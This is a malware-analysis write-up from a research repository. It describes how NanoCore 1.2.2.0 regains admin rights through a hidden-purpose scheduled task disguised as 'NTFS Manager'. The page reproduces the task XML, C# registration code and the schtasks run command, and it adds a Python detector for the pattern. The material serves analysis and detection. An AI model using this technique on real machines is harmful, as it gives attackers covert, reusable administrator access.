MalwareAnalysisSeries

This repository contains the analysis reports, technical details or any tools created for helping in malware analysis. Additionally, the repo contains extracted TTPs with code along with the detection rules


Project maintained by shaddy43. Hosted on GitHub Pages, theme by mattgraham.

NanoCore 1.2.2.0: Privilege Escalation


This is a privilege escalation TTP extracted from NanoCore 1.2.2.0. It uses the Windows Task Scheduler to escalate privileges. The NanoCore client is initially executed with admin privileges and creates a scheduled task with an admin (highest-available run level) configuration. Once the task has been registered, the NanoCore client can regain admin privileges at any time, even after a reboot, simply by running that task.

  1. Execute with admin privileges first
  2. Privileges can then be elevated at any time by running the command: schtasks.exe /run /tn "NTFS Manager"
  3. "NTFS Manager" is the name of the malicious task, masquerading as a legitimate Windows operation (in NanoCore these names are randomized)
  4. "GetUACControlData" returns the task configuration in bytes

Implementation

Setup task settings file

The NanoCore 1.2.2.0 privilege escalation function carries the encoded bytes of an XML file that sets up everything for the task. The malware decodes this configuration, replaces the #EXECUTABLEPATH identifier in the XML with the path of its executable (plus arguments, if any), and uses the result to register the task.

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo />
  <Triggers />
  <Principals>
    <Principal id="Author">
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
    <StartWhenAvailable>false</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <StopOnIdleEnd>false</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>false</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
    <Priority>4</Priority>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>"#EXECUTABLEPATH"</Command>
      <Arguments>$(Arg0)</Arguments>
    </Exec>
  </Actions>
</Task>

According to the task configuration, no triggers are set, so the task never executes automatically. As mentioned above, NanoCore doesn't use it to achieve persistence; it uses it to elevate privileges. To do that, only a single command is needed: run the task that was registered.
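A defender-side check for this pattern, added here as an example (not code from the repository): it parses an exported task definition (for instance from `schtasks /query /tn <name> /xml`) and scores the combination NanoCore relies on, an elevated run level, no triggers, on-demand start and a payload in a user-writable location. The namespace is the one in the XML above; the user-writable path list and both sample tasks are constructed for this example.

```python
import xml.etree.ElementTree as ET

# Namespace of Task Scheduler XML (as in the NanoCore template above)
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Locations a standard user can write to (assumed list; extend for your estate)
USER_WRITABLE = ("c:\\users\\", "%appdata%", "%localappdata%", "%temp%",
                 "%userprofile%", "%programdata%")

def assess_task(xml_text):
    """Score one exported task definition for the NanoCore elevation pattern."""
    root = ET.fromstring(xml_text)

    def text_of(path):
        el = root.find(path, NS)
        return (el.text or "").strip() if el is not None else ""

    triggers = root.find("t:Triggers", NS)
    command = text_of("t:Actions/t:Exec/t:Command").strip('"').lower()
    ind = {
        # full admin token whenever the registering user is an administrator
        "highest_available": text_of("t:Principals/t:Principal/t:RunLevel") == "HighestAvailable",
        # never fires by itself: only useful through an explicit run request
        "no_triggers": triggers is None or len(triggers) == 0,
        "on_demand": text_of("t:Settings/t:AllowStartOnDemand").lower() == "true",
        # payload lives where an unprivileged user could have dropped it
        "user_writable_command": command.startswith(USER_WRITABLE),
    }
    ind["score"] = sum(1 for v in ind.values() if v is True)
    ind["suspicious"] = ind["highest_available"] and ind["score"] >= 3
    return ind

# Constructed sample: the NanoCore template with #EXECUTABLEPATH filled in
NANOCORE_LIKE = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers />
  <Principals><Principal id="Author"><LogonType>InteractiveToken</LogonType>
    <RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Settings><AllowStartOnDemand>true</AllowStartOnDemand><Enabled>true</Enabled></Settings>
  <Actions Context="Author"><Exec>
    <Command>"C:\\Users\\alice\\AppData\\Roaming\\client.exe"</Command>
    <Arguments>$(Arg0)</Arguments></Exec></Actions>
</Task>"""

# Constructed sample: a scheduled, least-privilege task run from a system directory
BENIGN = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2024-01-01T03:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Settings><AllowStartOnDemand>true</AllowStartOnDemand></Settings>
  <Actions Context="Author"><Exec><Command>C:\\Windows\\System32\\cleanmgr.exe</Command></Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for name, xml in (("nanocore-like", NANOCORE_LIKE), ("benign", BENIGN)):
        print(name, assess_task(xml))
```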

Register Task

using System;
using System.Diagnostics;
using System.IO;

// Registers the task from the decoded XML. `task` is the masquerading task name
// (e.g. "NTFS Manager"), `text` the XML above with #EXECUTABLEPATH replaced,
// `duration` the milliseconds to wait for schtasks.exe to finish.
static bool CreateScheduledTask(string task, string text, int duration)
{
	try
	{
		//creating a temporary task config xml file
		string tempFileName = Path.GetTempFileName();
		File.WriteAllText(tempFileName, text);

		//scheduling task
		string task_cmd = string.Format("/create /f /tn \"{0}\" /xml \"{1}\"", task, tempFileName);
		ProcessStartInfo startInfo = SetProcessInfo("schtasks.exe", task_cmd);
		Process process = Process.Start(startInfo);

		bool result = false;
		if (process.WaitForExit(duration))
		{
			result = (process.ExitCode == 0);
		}

		File.Delete(tempFileName); //delete temporary task configuration file
		return result;
	}
	catch (Exception exception_)
	{
		Console.WriteLine(exception_ + ":CreateScheduledTask");
	}
	return false; //schtasks.exe failed, timed out or could not be started
}

// SetProcessInfo is the malware's own helper; its body is not shown on this page.
// Assumed here to build a ProcessStartInfo that runs schtasks.exe without a window.
static ProcessStartInfo SetProcessInfo(string fileName, string arguments)
{
	return new ProcessStartInfo(fileName, arguments)
	{
		UseShellExecute = false,
		CreateNoWindow = true
	};
}

Elevate

After the task has successfully been registered, we can run it like this:

schtasks.exe /run /tn "NTFS Manager"   // e.g. NTFS Manager is the name of the registered task

The complete code can be found here: Shaddy43/MalwareAnalaysisSeries

Disclaimer

Artifacts and code in this repository are intended for educational purposes only!